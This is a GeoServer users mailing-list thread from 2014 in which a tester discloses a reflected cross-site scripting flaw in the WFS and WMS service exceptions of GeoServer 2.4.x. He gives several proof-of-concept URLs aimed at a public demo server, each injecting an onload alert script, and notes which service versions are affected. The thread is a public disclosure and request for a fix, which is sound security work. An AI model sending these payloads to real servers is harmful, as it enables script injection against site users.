Hi,
Ok, the open source way is fine with me.
During a security test we discovered that there is a potential XSS (Cross site
scripting) flaw in the generation of service exceptions in (some) WMS and WFS
services of Geoserver 2.4.x. I haven ‘t been able to test using Geoserver 2.5,
perhaps the flaw is fixed? Please let me know if so.
WFS Proof of concept:
WFS 1.0 PoC:
http://demo.opengeo.org/geoserver/ows?SERVICE=WFS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"&VERSION=1.0<http://demo.opengeo.org/geoserver/ows?SERVICE=WFS&request=%22%3e%3ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3e%3ca:body%20onload=%22alert%28%27xss%27%29%22/%3e%3c/a%3e%3c%22&VERSION=1.0>
If I remove the version info, or use WFS version=2.0, the service exception is
encoded properly, and no injection is possible:
WFS (without version):
http://demo.opengeo.org/geoserver/ows?SERVICE=WFS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"
The WMS service behaves differently. Using no version (or version 1.3.0), the
XSS is “successfull”. Using 1.1.1 version the content-type response header is
set to application/vnd.ogc.se_xml, hence no execution in the browser.
WMS Proof of concept:
WMS (without version):
http://demo.opengeo.org/geoserver/ows?SERVICE=WMS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"
Using version 1.1.1 set’s the content-type header to application/vnd.ogc.se_xml:
WMS (version 1.1.1):
http://demo.opengeo.org/geoserver/ows?SERVICE=WMS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"&version=1.1.<http://demo.opengeo.org/geoserver/ows?SERVICE=WMS&request=%22%3e%3ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3e%3ca:body%20onload=%22alert%28%27xss%27%29%22/%3e%3c/a%3e%3c%22&version=1.1.>1
It seems to me that the correct handling of service exception is implemented in
the WFS 2.0 “handler”, is it possible to update the source of the other to
behave similar?
Regards
Mats
Från: [email protected] [mailto:[email protected]] För Andrea Aime
Skickat: den 9 maj 2014 14:09
Till: Isakson Mats
Kopia: [email protected]
Ämne: Re: [Geoserver-users] Handling of a detected security flaw
On Fri, May 9, 2014 at 1:32 PM, Isakson Mats
<[email protected]<mailto:[email protected]>> wrote:
Hi,
In general, how do you handle potential security flaws? Do we discuss the
potential flaw here on the mailing list?
There are two possible mechanisms:
* the open source way, in the open, on the mailing list
* the commercial way, in private, with a commercial support provider
It would be nice to have a "free but private" way, to do that we'd need some
staff that
has paid time to look at these issues from e.g., a foundation of sorts, but
that's not
something we have available (or that was ever discussed)
Cheers
Andrea
--
==
Meet us at GEO Business 2014! in London! Visit http://goo.gl/fES3aK
for more information.
==
Ing. Andrea Aime
@geowolf
Technical Lead
GeoSolutions S.A.S.
Via Poggio alle Viti 1187
55054 Massarosa (LU)
Italy
phone: +39 0584 962313
fax: +39 0584 1660272
mob: +39 339 8844549
http://www.geo-solutions.it
http://twitter.com/geosolutions_it
-------------------------------------------------------
------------------------------------------------------------------------------
Is your legacy SCM system holding you back? Join Perforce May 7 to find out:
• 3 signs your SCM is hindering your productivity
• Requirements for releasing software faster
• Expert tips and advice for migrating your SCM now
http://p.sf.net/sfu/perforce
_______________________________________________
Geoserver-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/geoserver-users
